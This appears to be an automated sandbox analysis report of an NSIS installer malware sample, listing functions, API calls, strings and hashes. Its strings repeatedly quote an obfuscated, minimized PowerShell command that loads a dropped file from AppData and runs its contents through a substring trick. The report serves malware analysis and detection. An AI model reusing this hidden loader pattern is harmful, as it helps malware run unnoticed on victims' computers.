Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
Instruction ID: a10b3c54e235fed7265b7e368dd63080585aa0dd988869772eea30aa6a37580d
Opcode Fuzzy Hash: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
Instruction Fuzzy Hash: 2DD012319590306BC3105F786D0C85B7A589B993317618A33B466F62F0C7388D629AE9

Function 00402645 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402654

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 94cf938a9d0ff6ef35911b7a4d07d04fb574dedb7636cc3958d2f67a1536c597
Instruction ID: e095c2a4769a5e18af137d5e24cc0f066a76803936003d94c8e443da5dd33856
Opcode Fuzzy Hash: 94cf938a9d0ff6ef35911b7a4d07d04fb574dedb7636cc3958d2f67a1536c597
Instruction Fuzzy Hash: 58F0EC72508110EBD700E77499499EE7778DF51314F60457BF141F21C1D3B84941EB2A

Function 00403B19 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B55
ShowWindow.USER32(?), ref: 00403B72
DestroyWindow.USER32 ref: 00403B86
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA2
GetDlgItem.USER32(?,?), ref: 00403BC3
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BD7
IsWindowEnabled.USER32(00000000), ref: 00403BDE
GetDlgItem.USER32(?,00000001), ref: 00403C8C
GetDlgItem.USER32(?,00000002), ref: 00403C96
SetClassLongA.USER32(?,000000F2,?), ref: 00403CB0
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D01
GetDlgItem.USER32(?,00000003), ref: 00403DA7
ShowWindow.USER32(00000000,?), ref: 00403DC8
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DDA
EnableWindow.USER32(?,?), ref: 00403DF5
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0B
EnableMenuItem.USER32(00000000), ref: 00403E12
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E2A
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E3D
lstrlenA.KERNEL32(reckling: Installing,?,reckling: Installing,00422F00), ref: 00403E66
SetWindowTextA.USER32(?,reckling: Installing), ref: 00403E75
ShowWindow.USER32(?,0000000A), ref: 00403FA9

Strings

reckling: Installing, xrefs: 00403E52, 00403E5C, 00403E65, 00403E73

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: reckling: Installing
API String ID: 3282139019-1062532133
Opcode ID: 27ef697ed585f907fa2005ca557fe715e2cd5084a56b06754159dcce861c4f01
Instruction ID: 153bf0bbc826156ff643e1a37e17b62c3978853f10e30dc38cd17efbe60f3484
Opcode Fuzzy Hash: 27ef697ed585f907fa2005ca557fe715e2cd5084a56b06754159dcce861c4f01
Instruction Fuzzy Hash: 00C1D071A04205BBDB21AF21ED44E2B7EBCFB4470AF40443EF601B11E1C7799942AB6E

Function 00403787 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040601C: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
Part of subcall function 0040601C: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
Part of subcall function 0040601C: GetProcAddress.KERNEL32(00000000,?), ref: 0040604A

lstrcatA.KERNEL32(1033,reckling: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,reckling: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76F93410,"C:\Users\user\Desktop\ulf4JrCRk2.exe",00000000), ref: 00403802
lstrlenA.KERNEL32(004226A0,?,?,?,004226A0,00000000,C:\Users\user\AppData\Roaming\supersystem\panelet,1033,reckling: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,reckling: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403877
lstrcmpiA.KERNEL32(?,.exe), ref: 0040388A
GetFileAttributesA.KERNEL32(004226A0), ref: 00403895
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\supersystem\panelet), ref: 004038DE

Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C

RegisterClassA.USER32(00422EA0), ref: 0040391B
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403933
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403968
ShowWindow.USER32(00000005,00000000), ref: 0040399E
LoadLibraryA.KERNELBASE(RichEd20), ref: 004039AF
LoadLibraryA.KERNEL32(RichEd32), ref: 004039BA
GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039CA
GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039D7
RegisterClassA.USER32(00422EA0), ref: 004039E0
DialogBoxParamA.USER32(?,00000000,00403B19,00000000), ref: 004039FF

Strings

.DEFAULT\Control Panel\International, xrefs: 004037ED
RichEdit, xrefs: 004039D1
RichEd32, xrefs: 004039B5
reckling: Installing, xrefs: 004037B3, 004037B9, 004037DE, 004037E7, 004037FC
C:\Users\user\AppData\Local\Temp\, xrefs: 00403793
RichEdit20A, xrefs: 004039C2, 004039C8
C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 00403811, 00403819, 004038B1, 004038B7, 004038C7
RichEd20, xrefs: 004039AA
"C:\Users\user\Desktop\ulf4JrCRk2.exe", xrefs: 0040378B
_Nb, xrefs: 004038FA, 00403962
1033, xrefs: 004037A7, 004037FD
Control Panel\Desktop\ResourceLocale, xrefs: 004037BB
.exe, xrefs: 00403884

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\ulf4JrCRk2.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\supersystem\panelet$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$reckling: Installing
API String ID: 914957316-896290493
Opcode ID: 055baf77df7a5e45cba707c16d51d4eb88bfad4ce7f21b2f580e300121f2fe1e
Instruction ID: 105b881253acfb20a149285e15a71ffac9a88723c4648682b83d6f47b67848ff
Opcode Fuzzy Hash: 055baf77df7a5e45cba707c16d51d4eb88bfad4ce7f21b2f580e300121f2fe1e
Instruction Fuzzy Hash: CC61D6B16442007EE720AF619D45F273EACEB8475AF40407FF945B22E1D67CAD02DA2E

Function 00402C79 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402C8D
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ulf4JrCRk2.exe,00000400), ref: 00402CA9

Part of subcall function 00405982: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ulf4JrCRk2.exe,80000000,00000003), ref: 00405986
Part of subcall function 00405982: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ulf4JrCRk2.exe,C:\Users\user\Desktop\ulf4JrCRk2.exe,80000000,00000003), ref: 00402CF2
GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E39

Strings

Inst, xrefs: 00402D60
C:\Users\user\Desktop, xrefs: 00402CD4, 00402CD9, 00402CDF
"C:\Users\user\Desktop\ulf4JrCRk2.exe", xrefs: 00402C79
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C86, 00402E51
C:\Users\user\Desktop\ulf4JrCRk2.exe, xrefs: 00402C93, 00402CA2, 00402CB6, 00402CD3
Null, xrefs: 00402D72
Error launching installer, xrefs: 00402CC9
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
soft, xrefs: 00402D69

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\ulf4JrCRk2.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ulf4JrCRk2.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-2580742348
Opcode ID: f8b3b9eff59f9593db0cf7fefcc0c5331fae69f0157aa5f548c26de072740380
Instruction ID: a3297f7e43c120df5600b6fd5f4255024b2ca4e5a22dc20eb426d949fad314b7
Opcode Fuzzy Hash: f8b3b9eff59f9593db0cf7fefcc0c5331fae69f0157aa5f548c26de072740380
Instruction Fuzzy Hash: E661C671A40205ABDF20AF64DE89B9A76B4EF00315F60413BF904B72D1D7BC9E419BAD

Function 0040173F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Grammofonpladerne,C:\Users\user\AppData\Roaming\supersystem\panelet,00000000,00000000,00000031), ref: 0040177E
CompareFileTime.KERNEL32(-00000014,?,Grammofonpladerne,Grammofonpladerne,00000000,00000000,Grammofonpladerne,C:\Users\user\AppData\Roaming\supersystem\panelet,00000000,00000000,00000031), ref: 004017A8

Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE

Part of subcall function 00404FDC: lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

Strings

C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 0040176C
Grammofonpladerne, xrefs: 0040175B, 00401764, 00401783, 00401794, 004017CA, 004017E0, 004017FE, 0040183E, 004018BF, 004018C8, 004018D2, 004018DD
incarnations\Vaporized\hippogriff, xrefs: 0040180C, 00401828
%machinates%\vatter\udkastelses.Bss116, xrefs: 00401789, 004017F8, 00401816
"Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) , xrefs: 004017F3, 004017FF, 00401817

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) $%machinates%\vatter\udkastelses.Bss116$C:\Users\user\AppData\Roaming\supersystem\panelet$Grammofonpladerne$incarnations\Vaporized\hippogriff
API String ID: 1941528284-3071970010
Opcode ID: f81b4b0a62f07454d43e24b26e3037c1c7dc23f8998e09d171ce13397913933d
Instruction ID: 6271ed47795bff7848a1184a65af423285d25a4990901b96ed448ffc086cd7e6
Opcode Fuzzy Hash: f81b4b0a62f07454d43e24b26e3037c1c7dc23f8998e09d171ce13397913933d
Instruction Fuzzy Hash: 4E41C371900615BBCF10BFA5DC46EAF3669DF41368B20823BF521B20E1D63C8A419B6D

Function 00404FDC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000), ref: 00405038
SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "), ref: 0040504A
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

Strings

Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ", xrefs: 00404FFC, 0040500E, 00405014, 00405037, 00405043

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "
API String ID: 2531174081-2660478707
Opcode ID: 56d315ba140f420ded578357030aec08d31bda6d9c178eb4f5598fdd5f2b2a91
Instruction ID: 23c8d3588392bc678d7246373841442171ea5a50e124834ae8740ae97285bd87
Opcode Fuzzy Hash: 56d315ba140f420ded578357030aec08d31bda6d9c178eb4f5598fdd5f2b2a91
Instruction Fuzzy Hash: FD218C71900508BADB119FA5DD84ADFBFA9EF14354F14807AF504B6290C2799A41CFA8

Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93

Part of subcall function 00404FDC: lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D

Strings

"Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) , xrefs: 00401FE7

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

